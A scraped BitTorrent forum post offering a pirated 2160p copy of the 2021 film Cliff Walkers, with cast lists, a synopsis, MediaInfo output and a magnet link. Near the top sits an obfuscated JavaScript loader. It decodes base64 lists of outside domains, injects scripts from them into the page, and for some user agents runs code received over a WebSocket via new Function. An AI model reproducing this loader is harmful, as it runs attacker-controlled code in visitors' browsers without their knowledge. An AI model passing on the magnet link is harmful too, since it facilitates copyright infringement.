悬崖之上[国语音轨].Cliff.Walkers.2021.V2.2160p.迅雷下载 14.65GB

版主小s 27天前 364

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

image.png

◎译 名 悬崖之上 / Impasse / Cliff Walkers

◎年 代 2021

◎产 地 中国大陆 / 中国香港

◎类 别 剧情 / 动作 / 悬疑

◎语 言 汉语普通话 / 英语 / 俄语

◎上映日期 2021-04-30(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt11448076/

◎豆瓣评分 7.6/10 (423042人评价)

◎豆瓣链接 https://movie.douban.com/subject/32493124/

◎片 长 120分钟

◎导 演 张艺谋 Yimou Zhang (id:1054398)

◎编 剧 全勇先 Yongxian Quan (id:1318171)

张艺谋 Yimou Zhang (id:1054398)

潘依然 Yiran Pan (id:1405343)

◎演 员 张译 Yi Zhang (id:1274761)

于和伟 Hewei Yu (id:1313742)

秦海璐 Hailu Qin (id:1274437)

朱亚文 Yawen Zhu (id:1312699)

刘浩存 Haocun Liu (id:1410267)

倪大红 Dahong Ni (id:1274306)

李乃文 Naiwen Li (id:1274530)

周晓凡 Xiaofan Zhou (id:1442404)

雷佳音 Jiayin Lei (id:1312940)

沙溢 Yi Sha (id:1274648)

韩昊霖 Haolin Han (id:1396506)

安冬 Dong An (id:1373336)

逯长恩 Chang'en Lu (id:1325615)

冯瓅 Li Feng (id:1319504)

白恩 En Bai (id:1327332)

封新天 Xintian Feng (id:1451203)

齐羽嘉 Yujia Qi (id:1416332)

丁子迪 Zidi Ding (id:1365828)

芮丹尼 Danny Ray (id:1391362)

松天硕 Tianshuo Song (id:1403108)

马睿瀚 Ruihan Ma (id:1390556)

纪焕博 Rock Ji (id:1321846)

王乃训 Naixun Wang (id:1386026)

陈永胜 Yongsheng Chen (id:1436031)

焦宏奋 Hongfen Jiao (id:1412277)

杨受成 Albert Yeung (id:1313455)

庞丽薇 Liwei Pang (id:1406322)

梁琳 Lin Liang (id:1400716)

杨政龙 Zhenglong Yang (id:1442412)

梁郁 Yu Liang (id:1442414)

许建海 Jianhai Xu (id:1384186)

王垂林 Chuilin Wang (id:1446629)

马寅 Yin Ma (id:1402444)

于晓楠 Xiaonan Yu (id:1417264)

李捷 Jie Li (id:1403835)

彭鸣宇 Mingyu Peng (id:1446113)

赵海城 Haicheng Zhao (id:1392082)

邵剑秋 Kim-Chau Shiu (id:1413263)

王隽 (id:1448949)

叶蓁蓁 Zhenzhen Ye (id:1453514)

曹永旭 Yeong-wook Jo (id:1287735)

周深 Shen Zhou (id:1366895)

赵小丁 Xiaoding Zhao (id:1274347)

赵显章 Xianzhang Zhao (id:1406352)

李永一 Yongyi Li (id:1379294)

付璐璐 Lulu Fu (id:1401800)

林木 Lin Mu (id:1325046)

李言 Yan Li (id:1456204)

陈敏正 Minzheng Chen (id:1346314)

梁郁 Yu Liang (id:1442414)

任茂成 Maocheng Ren (id:1401816)

杨江 Jiang Yang (id:1351381)

赵楠 Nan Zhao (id:1325307)

王星会 Samson Sing Wun Wong (id:1401244)

郑斗洪 Doo-hong Jung (id:1109833)

◎标 签 谍战 / 张艺谋 / 悬疑 / 于和伟 / 剧情 / 中国大陆 / 2021 / 刘浩存

◎简 介

上世纪三十年代,四位曾在苏联接受特训的共产党特工组成任务小队,回国执行代号为“乌特拉”的秘密行动。由于叛徒的出卖,他们从跳伞降落的第一刻起,就已置身于敌人布下的罗网之中。同志能否脱身,任务能否完成,雪一直下,立于“悬崖之上”的行动小组面临严峻考验。

  1. General

  2. Unique ID : 138504356672714203968643376462148793794 (0x6832F802E906C2E299AF61695039F5C2)

  3. Complete name : 悬崖之上.Cliff.Walkers.2021.V2.2160p.WEB-DL.DD5.1.H265-HDSWEB.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 14.6 GiB

  7. Duration : 2 h 0 min

  8. Overall bit rate : 17.4 Mb/s

  9. Encoded date : UTC 2021-06-24 06:47:52

  10. Writing application : mkvmerge v40.0.0 ('Old Town Road + Pony') 64-bit

  11. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : [email protected]@Main

  17. Codec ID : V_MPEGH/ISO/HEVC

  18. Duration : 2 h 0 min

  19. Bit rate : 17.0 Mb/s

  20. Width : 3 840 pixels

  21. Height : 1 616 pixels

  22. Display aspect ratio : 2.40:1

  23. Frame rate mode : Constant

  24. Frame rate : 24.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.114

  29. Stream size : 14.3 GiB (97%)

  30. Default : Yes

  31. Forced : No


  32. Audio

  33. ID : 2

  34. Format : E-AC-3 JOC

  35. Format/Info : Enhanced AC-3 with Joint Object Coding

  36. Commercial name : Dolby Digital Plus with Dolby Atmos

  37. Codec ID : A_EAC3

  38. Duration : 2 h 0 min

  39. Bit rate mode : Constant

  40. Bit rate : 448 kb/s

  41. Channel(s) : 6 channels

  42. Channel layout : L R C LFE Ls Rs

  43. Sampling rate : 48.0 kHz

  44. Frame rate : 31.250 FPS (1536 SPF)

  45. Compression mode : Lossy

  46. Stream size : 386 MiB (3%)

  47. Language : Chinese

  48. Service kind : Complete Main

  49. Default : Yes

  50. Forced : No

  51. Complexity index : 16

  52. Number of dynamic objects : 15

  53. Bed channel count : 1 channel

  54. Bed channel configuration : LFE


TAGS 动作 剧情 悬疑

磁力链:
  • magnet:?xt=urn:btih:68723764A72E66847DF896BB8E657B10DBD7FFEB
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回